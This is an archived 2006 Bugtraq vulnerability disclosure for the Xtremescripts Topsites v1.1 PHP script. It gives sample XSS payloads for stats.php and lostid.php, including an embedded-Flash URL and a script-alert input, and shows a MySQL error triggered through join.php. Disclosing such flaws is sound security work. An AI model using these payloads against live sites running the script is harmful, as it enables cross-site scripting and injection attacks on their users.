Xtremescripts Topsites v1.1

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Xtremescripts Topsites v1.1
From: luny@xxxxxxxxxxxxxxx
Date: 19 May 2006 22:39:43 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Xtremescripts Topsites v1.1

Homepage:
http://www.xtremescripts.com/topsites.php

Description:

Xtreme Topsites is a popular topsite PHP script for websites. Most commonly 
  used across anime websites at the moment. The topsite will count hits/clicks 
  in and hits out and will rank them on total hits so that the site with the 
most 
  hits will be number 1. 

Effected files:
stats.php
join.php
lostid.php

Exploit:
stats.php allows embedded objects which in turn can cause a XSS.

example:

http://www.example.com/xtremets/stats.php?id=1 <embed 
allowScriptAccess="never"src="harmfulflash.swf" quality="high" 
pluginspage="http://www.macromedia.com/go/getflashplayer"; 
type="application/x-shockwave-flash" width="

0" height="0"></embed>


lostid.php input data isn't properally sanatized & filtered which allows for XSS

example:

put in box: <script>alert('hi')</script>

Input data on join.php isn't sanatized and can create mysql errors if users 
input malicious data.

example:

You have an error in your SQL syntax; check the manual that corresponds to your 
MySQL server version for the right 

syntax to use near 
'hi'','9cdfb439c7876e703e307864c9167a15','0','19052006','-')' at line 2

Prev by Date: Interlink "news_information.php" XSS
Next by Date: [SECURITY] [DSA 1067-1] New Linux kernel 2.4.16 packages fix several vulnerabilities
Previous by thread: Interlink "news_information.php" XSS
Next by thread: [SECURITY] [DSA 1067-1] New Linux kernel 2.4.16 packages fix several vulnerabilities
Index(es):
- Date
- Thread